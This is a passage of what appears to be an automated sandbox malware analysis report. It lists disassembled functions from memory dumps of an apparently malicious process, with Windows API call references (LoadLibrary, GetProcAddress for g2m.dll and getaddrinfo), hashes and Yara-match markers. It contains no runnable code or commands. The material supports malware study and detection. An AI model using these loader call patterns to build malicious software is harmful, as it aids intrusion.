                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuerylstrcatlstrcmplstrcpy
                                                                                                                                                                • String ID: ?
                                                                                                                                                                • API String ID: 1756451316-1684325040
                                                                                                                                                                • Opcode ID: 6699bc623dbb7e12ed729abb7802044362a58c635fa5ba79e3b0ef5532281bf8
                                                                                                                                                                • Instruction ID: a20544d52a5c68807da39948e000a589ff735aa5f473e3faa02781c0ff4fa25e
                                                                                                                                                                • Opcode Fuzzy Hash: 6699bc623dbb7e12ed729abb7802044362a58c635fa5ba79e3b0ef5532281bf8
                                                                                                                                                                • Instruction Fuzzy Hash: EF51C571E002199BDF20AF68DC48AEEB7B8EF55300F1485A5E50AD3151E73A8E82CF55
                                                                                                                                                                Function 02599E08 Relevance: 24.4, APIs: 16, Instructions: 419COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4495447446.0000000002550000.00000040.00001000.00020000.00000000.sdmp, Offset: 02550000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_2550000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _free$___from_strstr_to_strchr_wcschr
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1963305004-0
                                                                                                                                                                • Opcode ID: 01e9dea61551f3c676d83aed5e9293f3e2c3338c95b70883925f944a7824f320
                                                                                                                                                                • Instruction ID: 8133191962b6d9c348e83b8038d9182aec124c19d8c2ed48e2125e73ae0972ec
                                                                                                                                                                • Opcode Fuzzy Hash: 01e9dea61551f3c676d83aed5e9293f3e2c3338c95b70883925f944a7824f320
                                                                                                                                                                • Instruction Fuzzy Hash: 91D13A71D04312AFEF35AF78C8807BE7FAABF45364F04456EE90597280EB7599008B68
                                                                                                                                                                Function 00401000 Relevance: 23.0, APIs: 9, Strings: 4, Instructions: 220libraryloaderwindowCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • GetCommandLineW.KERNEL32 ref: 0040102E
                                                                                                                                                                • ExitProcess.KERNEL32 ref: 004010E5
                                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 004010ED
                                                                                                                                                                • GetStartupInfoW.KERNEL32(?), ref: 0040110F
                                                                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00401124
                                                                                                                                                                • GetModuleHandleA.KERNEL32(g2m.dll), ref: 004012B0
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 004012DD
                                                                                                                                                                • MessageBoxA.USER32(00000000,004020D0,004020F8,00001010), ref: 00401365
                                                                                                                                                                • ExitProcess.KERNEL32 ref: 0040136E
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4485529625.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4485433706.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4486274195.0000000000402000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4486390294.0000000000405000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Module$ExitHandleProcess$AddressCommandFileInfoLineMessageNameProcStartup
                                                                                                                                                                • String ID: @$L @$g2m.dll$ @
                                                                                                                                                                • API String ID: 195749359-3595644552
                                                                                                                                                                • Opcode ID: ceec47a5d53db67a8d79af026ed4ac63fb2276ab56d47e98b41f77515e37c241
                                                                                                                                                                • Instruction ID: 63a75bd892d71ac9ed38526556f16685a0eeff41e3f2f7a4e783f2f0301856aa
                                                                                                                                                                • Opcode Fuzzy Hash: ceec47a5d53db67a8d79af026ed4ac63fb2276ab56d47e98b41f77515e37c241
                                                                                                                                                                • Instruction Fuzzy Hash: 18B1E570D00269CFDF25DFA4C988BEDBBB0BB08305F1045AAD919B72A1D7B85A85CF15
                                                                                                                                                                Function 000A11D7 Relevance: 22.8, APIs: 15, Instructions: 296COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _free$Info
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2509303402-0
                                                                                                                                                                • Opcode ID: af369c170f48a4fe8c5d9b73317f601294e22c38d764c7131ece8036ffc18ba7
                                                                                                                                                                • Instruction ID: e03b05b77c90a9970cb5c9efc2c0d88ed93c46e3412addec3e8cb3899a405fc0
                                                                                                                                                                • Opcode Fuzzy Hash: af369c170f48a4fe8c5d9b73317f601294e22c38d764c7131ece8036ffc18ba7
                                                                                                                                                                • Instruction Fuzzy Hash: 20B18E71900245AFDB21DFB8C881BEEBBF5BF0A304F14416DF895AB252DB75A9418B60
                                                                                                                                                                Function 02590C42 Relevance: 21.3, APIs: 14, Instructions: 296COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4495447446.0000000002550000.00000040.00001000.00020000.00000000.sdmp, Offset: 02550000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_2550000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _free
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 269201875-0
                                                                                                                                                                • Opcode ID: 7968ade7a949548a6b25a6b3dcfda45e4f79cd3c37b0775f6380da79d409272b
                                                                                                                                                                • Instruction ID: cc0a87a8d4dcc1b3f36baf8d25119c04283e4a86a38ba79178609de035954d71
                                                                                                                                                                • Opcode Fuzzy Hash: 7968ade7a949548a6b25a6b3dcfda45e4f79cd3c37b0775f6380da79d409272b
                                                                                                                                                                • Instruction Fuzzy Hash: 4BB18F7190030A9FDF21DF68C880BEEBBF9FF48304F144569E499A7281DB75A941DB68
                                                                                                                                                                Function 000730BE Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 109libraryloaderCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0007310A
                                                                                                                                                                • LoadLibraryA.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 00073150
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 0007316A
                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,?,00000000,00000000,00000000), ref: 00073175
                                                                                                                                                                • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 000731B2
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 000731C4
                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 000731CF
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,000C8568), ref: 000731DE
                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 000731F5
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Library$AddressFreeProc$Load$DirectorySystem
                                                                                                                                                                • String ID: \ws2_32$\wship6$getaddrinfo
                                                                                                                                                                • API String ID: 2490988753-3078833738
                                                                                                                                                                • Opcode ID: acdea068fe6e227ae03e788262e251e2528f0cf0fd4621b53d33397513b4f811
                                                                                                                                                                • Instruction ID: 61e34ee618020a4b2732e04bb6b08bab5dacbb54d7c5d64bccb19524d0fabefa
                                                                                                                                                                • Opcode Fuzzy Hash: acdea068fe6e227ae03e788262e251e2528f0cf0fd4621b53d33397513b4f811
                                                                                                                                                                • Instruction Fuzzy Hash: DD31A472D0162967EB21DB60DC88EDF77E8EB05700F448255E908A3201E77DDF458BA5
                                                                                                                                                                Function 0259CC0E Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • _free.LIBCMT ref: 0259CC47
                                                                                                                                                                • ___free_lconv_mon.LIBCMT ref: 0259CC52
                                                                                                                                                                  • Part of subcall function 0259CF22: _free.LIBCMT ref: 0259CF3F
                                                                                                                                                                  • Part of subcall function 0259CF22: _free.LIBCMT ref: 0259CF51
                                                                                                                                                                  • Part of subcall function 0259CF22: _free.LIBCMT ref: 0259CF63
                                                                                                                                                                  • Part of subcall function 0259CF22: _free.LIBCMT ref: 0259CF75
                                                                                                                                                                  • Part of subcall function 0259CF22: _free.LIBCMT ref: 0259CF87
                                                                                                                                                                  • Part of subcall function 0259CF22: _free.LIBCMT ref: 0259CF99
                                                                                                                                                                  • Part of subcall function 0259CF22: _free.LIBCMT ref: 0259CFAB
                                                                                                                                                                  • Part of subcall function 0259CF22: _free.LIBCMT ref: 0259CFBD
                                                                                                                                                                  • Part of subcall function 0259CF22: _free.LIBCMT ref: 0259CFCF
                                                                                                                                                                  • Part of subcall function 0259CF22: _free.LIBCMT ref: 0259CFE1
                                                                                                                                                                  • Part of subcall function 0259CF22: _free.LIBCMT ref: 0259CFF3
                                                                                                                                                                  • Part of subcall function 0259CF22: _free.LIBCMT ref: 0259D005
                                                                                                                                                                  • Part of subcall function 0259CF22: _free.LIBCMT ref: 0259D017
                                                                                                                                                                • _free.LIBCMT ref: 0259CC69
                                                                                                                                                                • _free.LIBCMT ref: 0259CC7E
                                                                                                                                                                • _free.LIBCMT ref: 0259CC89
                                                                                                                                                                • _free.LIBCMT ref: 0259CCAB
                                                                                                                                                                • _free.LIBCMT ref: 0259CCBE
                                                                                                                                                                • _free.LIBCMT ref: 0259CCCC
                                                                                                                                                                • _free.LIBCMT ref: 0259CCD7
                                                                                                                                                                • _free.LIBCMT ref: 0259CD0F
                                                                                                                                                                • _free.LIBCMT ref: 0259CD16
                                                                                                                                                                • _free.LIBCMT ref: 0259CD33
                                                                                                                                                                • _free.LIBCMT ref: 0259CD4B
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4495447446.0000000002550000.00000040.00001000.00020000.00000000.sdmp, Offset: 02550000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_2550000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _free$___free_lconv_mon
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3658870901-0
                                                                                                                                                                • Opcode ID: 0e241020917a581edb4b2dbb372553fe3ffbd6d6578403ff0f0c2547304029ed
                                                                                                                                                                • Instruction ID: bc6672c03f189e7e93325254395d0cf4303b48284f283ddbe475312cdac8b338
                                                                                                                                                                • Opcode Fuzzy Hash: 0e241020917a581edb4b2dbb372553fe3ffbd6d6578403ff0f0c2547304029ed
                                                                                                                                                                • Instruction Fuzzy Hash: 0A3193315007029FEF24AB38D844B567BEAFF48366F14896AE469D7160DF35E840DB5C
                                                                                                                                                                Function 10007CC2 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • ___free_lconv_mon.LIBCMT ref: 10007D06
                                                                                                                                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 100090D7
                                                                                                                                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 100090E9
                                                                                                                                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 100090FB
                                                                                                                                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 1000910D
                                                                                                                                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 1000911F
                                                                                                                                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 10009131
                                                                                                                                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 10009143
                                                                                                                                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 10009155
                                                                                                                                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 10009167
                                                                                                                                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 10009179
                                                                                                                                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 1000918B
                                                                                                                                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 1000919D
                                                                                                                                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 100091AF
                                                                                                                                                                • _free.LIBCMT ref: 10007CFB
                                                                                                                                                                  • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
                                                                                                                                                                  • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                                                                                                • _free.LIBCMT ref: 10007D1D
                                                                                                                                                                • _free.LIBCMT ref: 10007D32
                                                                                                                                                                • _free.LIBCMT ref: 10007D3D
                                                                                                                                                                • _free.LIBCMT ref: 10007D5F
                                                                                                                                                                • _free.LIBCMT ref: 10007D72
                                                                                                                                                                • _free.LIBCMT ref: 10007D80
                                                                                                                                                                • _free.LIBCMT ref: 10007D8B
                                                                                                                                                                • _free.LIBCMT ref: 10007DC3
                                                                                                                                                                • _free.LIBCMT ref: 10007DCA
                                                                                                                                                                • _free.LIBCMT ref: 10007DE7
                                                                                                                                                                • _free.LIBCMT ref: 10007DFF
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498041205.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4497988151.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498041205.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_10000000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 161543041-0
                                                                                                                                                                • Opcode ID: 04f87de51616aa77c632626b63215b7c3e2981daeb02be256c48a4a07a0be686
                                                                                                                                                                • Instruction ID: 6de9b84f5b51ee4e35cbeb1ed48e08772f21b212059d2ac72beb9c863e9ed859
                                                                                                                                                                • Opcode Fuzzy Hash: 04f87de51616aa77c632626b63215b7c3e2981daeb02be256c48a4a07a0be686
                                                                                                                                                                • Instruction Fuzzy Hash: 90313931A04645EFFB21DA38E941B6A77FAFF002D1F11446AE84DDB159DE3ABC809B14
                                                                                                                                                                Function 000AD1A3 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • ___free_lconv_mon.LIBCMT ref: 000AD1E7
                                                                                                                                                                  • Part of subcall function 000AD4B7: _free.LIBCMT ref: 000AD4D4
                                                                                                                                                                  • Part of subcall function 000AD4B7: _free.LIBCMT ref: 000AD4E6
                                                                                                                                                                  • Part of subcall function 000AD4B7: _free.LIBCMT ref: 000AD4F8
                                                                                                                                                                  • Part of subcall function 000AD4B7: _free.LIBCMT ref: 000AD50A
                                                                                                                                                                  • Part of subcall function 000AD4B7: _free.LIBCMT ref: 000AD51C
                                                                                                                                                                  • Part of subcall function 000AD4B7: _free.LIBCMT ref: 000AD52E
                                                                                                                                                                  • Part of subcall function 000AD4B7: _free.LIBCMT ref: 000AD540
                                                                                                                                                                  • Part of subcall function 000AD4B7: _free.LIBCMT ref: 000AD552
                                                                                                                                                                  • Part of subcall function 000AD4B7: _free.LIBCMT ref: 000AD564
                                                                                                                                                                  • Part of subcall function 000AD4B7: _free.LIBCMT ref: 000AD576
                                                                                                                                                                  • Part of subcall function 000AD4B7: _free.LIBCMT ref: 000AD588
                                                                                                                                                                  • Part of subcall function 000AD4B7: _free.LIBCMT ref: 000AD59A
                                                                                                                                                                  • Part of subcall function 000AD4B7: _free.LIBCMT ref: 000AD5AC
                                                                                                                                                                • _free.LIBCMT ref: 000AD1DC
                                                                                                                                                                  • Part of subcall function 000A1E15: RtlFreeHeap.NTDLL(00000000,00000000,?,000A0866,00000001,00000001), ref: 000A1E2B
                                                                                                                                                                  • Part of subcall function 000A1E15: GetLastError.KERNEL32(AC02BBF3,?,000A0866,00000001,00000001), ref: 000A1E3D
                                                                                                                                                                • _free.LIBCMT ref: 000AD1FE
                                                                                                                                                                • _free.LIBCMT ref: 000AD213
                                                                                                                                                                • _free.LIBCMT ref: 000AD21E
                                                                                                                                                                • _free.LIBCMT ref: 000AD240
                                                                                                                                                                • _free.LIBCMT ref: 000AD253
                                                                                                                                                                • _free.LIBCMT ref: 000AD261
                                                                                                                                                                • _free.LIBCMT ref: 000AD26C
                                                                                                                                                                • _free.LIBCMT ref: 000AD2A4
                                                                                                                                                                • _free.LIBCMT ref: 000AD2AB
                                                                                                                                                                • _free.LIBCMT ref: 000AD2C8
                                                                                                                                                                • _free.LIBCMT ref: 000AD2E0
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 161543041-0
                                                                                                                                                                • Opcode ID: 1544fbf7d9b4f7ba5ad65e8032435e798945f6a4ade9d520896dc9b97c8d691f
                                                                                                                                                                • Instruction ID: 9d3455e5aae988e12ce465f633611b1af4b952d368a00e24b0c2dd30218ec6bc
                                                                                                                                                                • Opcode Fuzzy Hash: 1544fbf7d9b4f7ba5ad65e8032435e798945f6a4ade9d520896dc9b97c8d691f
                                                                                                                                                                • Instruction Fuzzy Hash: CA315C31600704AFEB60AAF8D845BDA73E9AF23310F14452AF85AD7552DF35ED90CB10
                                                                                                                                                                Function 000AD5B5 Relevance: 18.4, APIs: 12, Instructions: 376COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _free
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 269201875-0
                                                                                                                                                                • Opcode ID: 1a5ca54b36596ad37749563d119fc4e68a20727be45026b500f5852c660b9b47
                                                                                                                                                                • Instruction ID: f1ff88654b17854cc2ce964825c2bc6d0d783d9a3643944f8295fb90dcb7a816
                                                                                                                                                                • Opcode Fuzzy Hash: 1a5ca54b36596ad37749563d119fc4e68a20727be45026b500f5852c660b9b47
                                                                                                                                                                • Instruction Fuzzy Hash: EAC12072D40204ABDB20DBE8CC42FEE77F8AF4A740F154565FA15EB283E67499418B60
                                                                                                                                                                Function 6FE7D920 Relevance: 16.7, APIs: 10, Strings: 1, Instructions: 181COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498212044.000000006FE41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6FE40000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4498154753.000000006FE40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498290278.000000006FEA6000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498353235.000000006FEBD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498404459.000000006FEBE000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498464579.000000006FED3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498516460.000000006FED5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_6fe40000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Value
                                                                                                                                                                • String ID: 1o
                                                                                                                                                                • API String ID: 3702945584-528613903
                                                                                                                                                                • Opcode ID: 1ae5767a561f4eea347a88aab661198834847f5a7cba01b9f8ce696ad55903b8
                                                                                                                                                                • Instruction ID: 999a82a42e216875fefb96f896db99d9fa9697104d5c18c4e69e14f8a23f19af
                                                                                                                                                                • Opcode Fuzzy Hash: 1ae5767a561f4eea347a88aab661198834847f5a7cba01b9f8ce696ad55903b8
                                                                                                                                                                • Instruction Fuzzy Hash: 7F51FD39A04A548BDF309F688984BCA7FB6FF4B318F244169D9146B344DB74F401CBA6
                                                                                                                                                                Function 0009829A Relevance: 16.6, APIs: 11, Instructions: 116COMMONLIBRARYCODE
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00061D72,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 000982F2
                                                                                                                                                                • GetLastError.KERNEL32(?,?,00061D72,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 000982FF
                                                                                                                                                                • __dosmaperr.LIBCMT ref: 00098306
                                                                                                                                                                • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00061D72,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00098332
                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,00061D72,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0009833C
                                                                                                                                                                • __dosmaperr.LIBCMT ref: 00098343
                                                                                                                                                                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00061D72,?), ref: 00098386
                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,00061D72,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00098390
                                                                                                                                                                • __dosmaperr.LIBCMT ref: 00098397
                                                                                                                                                                • _free.LIBCMT ref: 000983A3
                                                                                                                                                                • _free.LIBCMT ref: 000983AA
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2441525078-0
                                                                                                                                                                • Opcode ID: 6047d9576b1cc76c52c454a02ffe3d3b6e0a79d62afc4e57db0712cc65ebe25d
                                                                                                                                                                • Instruction ID: 01b13acd2337a63d2d317f01ef525371e1d6b1a6f573739ed836ab997b5617a4
                                                                                                                                                                • Opcode Fuzzy Hash: 6047d9576b1cc76c52c454a02ffe3d3b6e0a79d62afc4e57db0712cc65ebe25d
                                                                                                                                                                • Instruction Fuzzy Hash: 6F318172904609BFDF159FA5CC45CEF3BB8AF47720B148259F81056291DF358E11EBA1
                                                                                                                                                                Function 6FE7CE30 Relevance: 16.0, APIs: 4, Strings: 5, Instructions: 245COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • GetStdHandle.KERNEL32(FFFFFFF5,?,?,?,?,?,?,?,?,?,?,?,?,?,6FE76885,6FEA4A78), ref: 6FE7CE67
                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6FE76885,6FEA4A78), ref: 6FE7CE76
                                                                                                                                                                • GetConsoleMode.KERNEL32(00000000,?), ref: 6FE7CEBA
                                                                                                                                                                • CloseHandle.KERNEL32(?,?,6FEACC54,6FEAE46C,?,?,6FEAE45C), ref: 6FE7D15A
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498212044.000000006FE41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6FE40000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4498154753.000000006FE40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498290278.000000006FEA6000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498353235.000000006FEBD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498404459.000000006FEBE000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498464579.000000006FED3000.00000004.00000001.01000000.0000000B.sdmpDownload File
